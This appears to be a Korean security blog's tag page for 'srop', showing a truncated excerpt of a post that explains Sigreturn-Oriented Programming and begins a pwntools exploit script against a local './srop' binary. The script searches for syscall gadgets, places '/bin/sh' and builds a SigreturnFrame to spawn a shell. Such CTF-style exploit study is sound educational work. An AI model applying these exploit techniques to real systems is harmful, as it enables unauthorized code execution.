Hmm… what is the target?

  • 홈
  • 태그
  • 방명록

srop 1

SROP

SROP ExploitSROP에서 핵심은 "sigreturn system call"이다.해당 system call이 호출될 때, rsp가 가르키는 메모리 영역에 sigcontext 구조체가 위치해야한다.pwntool에서는 SigreturnFrame()를 제공해주고, 거기에 값을 적절히 초기화해서 사용하면 된다. from pwn import *context.arch = 'amd64'p = process('./srop')elf = ELF('./srop')gadget = next(elf.search(asm('pop rax; syscall')))syscall = next(elf.search(asm('syscall')))binsh = '/bin/sh\x00'bss = elf.bss()frame = Sigretur..

Security & Hacking 2025.01.11
이전
1
다음
더보기
프로필사진

Hmm… what is the target?

No pain, No gain

  • 분류 전체보기 (16)
    • Development (2)
    • Security & Hacking (13)
    • Book (1)

Tag

Fuzzing, sysprog, Polymorphism, rehosting, Static Analysis, ssl stripping, CTF, llvm, srop, Command Injection, angr, Exploit, git, OOP, hacking, Book, VCS, Android, Embedded, codeql,

최근글과 인기글

  • 최근글
  • 인기글

최근댓글

공지사항

페이스북 트위터 플러그인

  • Facebook
  • Twitter

Archives

Calendar

«   2025/07   »
일 월 화 수 목 금 토
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31

방문자수Total

  • Today :
  • Yesterday :

Copyright © Kakao Corp. All rights reserved.

티스토리툴바